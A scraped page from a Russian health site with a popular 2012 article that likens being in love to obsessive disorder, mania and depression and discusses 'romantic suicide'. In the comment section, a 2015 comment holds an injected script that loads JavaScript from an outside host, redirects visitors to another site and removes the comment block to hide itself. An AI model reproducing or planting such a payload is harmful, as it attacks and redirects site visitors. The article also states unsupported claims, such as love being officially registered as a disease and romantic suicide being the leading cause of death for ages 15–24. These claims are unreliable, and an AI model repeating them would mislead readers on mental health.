Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Любовь как болезнь  >>  Любовь как болезнь
 
Обратная связь
 

Любовь как болезнь

Размер шрифта
14 февраля 2012 10:00
  • google_analytics: false
  • Нравится

«Я болен любовью» – часто преувеличивают поэты. А что же такое любовь на самом деле, неужели любовь - это болезнь? Да, так считают не только поэты, но и врачи. И это не шутка: любовь официально внесена в реестр болезней.

1

Ученые Сиракузского университета Нью-Йорка открыли, что эйфория при влюбленности родственна той, которую вызывает кокаин.

А известный британский психолог Фрэнк Таллис, преподаватель Института психиатрии Лондонского королевского колледжа и автор множества научных трудов и учебников, одну из своих книг так и назвал: «Любовная болезнь: любовь как психическое расстройство» (Love Sick: Love as a Mental Illness). Проявления влюбленности очень похожи на типичные нарушения психики: постоянные мысли о предмете страсти с непрерывным проигрышем событий, неадекватная оценка ситуации, мучительная тоска, переживания по пустякам, бессонница и многое другое. Систематизировав эти признаки, психолог выделил в этом чувстве следующие формы недуга.

Синдром навязчивых мыслей – болезненная одержимость, проверки и выслеживание, преувеличенное внимание к гигиеническим ритуалам, сокрытие и коллекционирование предметов, не имеющих никакой ценности. Больной концентрируется на специфических деталях, назойливых мыслях и страхах, какие-то незначительные мелочи обретают для него невероятную важность.

Мания – чрезмерно приподнятое, эйфорическое настроение, крайне завышенная самооценка, неспособность считаться с последствиями поступков, желание делать экстравагантные подарки.

Депрессия – плаксивость, подавленность, бессонница, невозможность сосредоточиться, нарушения в питании. У людей, угнетенных депрессией, снижен уровень обоих гормонов - серотонина и допамина. Эти же изменения в организме происходят, когда влюбленный разлучен с объектом любви или чувства его безответны. В одном исследовании собрали 114 человек, отвергнутых партнерами в последние два месяца. Клиническую депрессию выявили более чем у 40% из этой группы. Мужчины оказались более зависимыми от своих партнерш, а женщины - от отношений как таковых.

Особо тяжелая форма любовной тоски может довести до самоубийства. В психиатрии даже есть такой термин - «романтический суицид». Самые большие драмы происходят в подростковом возрасте и в юности. Например, в США и Китае «романтическое самоубийство» - самая частая причина смерти в возрастной группе от 15 до 24 лет. Одно из недавних исследований утверждает, что любовная неудача имеет много шансов довести подростков до депрессии, самоубийства и даже убийства.

Но, почему? На это есть ответ.

Префронтальная кора (Prefrontal cortex) и теменная доля большого мозга (Parietal Lobe) действуют, как переходящие части мозга, которые помогают переключаться вниманию от одного предмета к другому или к третьему.

Когда мы концентрируем внимание на одном предмете, будь то фокус с картами или объект любви, наш мозг воспринимает только сам объект, не замечая деталей вокруг. А в это время рядом могут происходить совершено разные события. Но мозг их не видит, т.к. он не может сфокусироваться на всем, что происходит вокруг, он выбирает короткие пути и фокусируется только на том, что важно именно сейчас. Так происходит, когда человек влюбляется.

 

Сюжеты по теме:
Диагноз вашей мечты. Любовь как болезнь

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.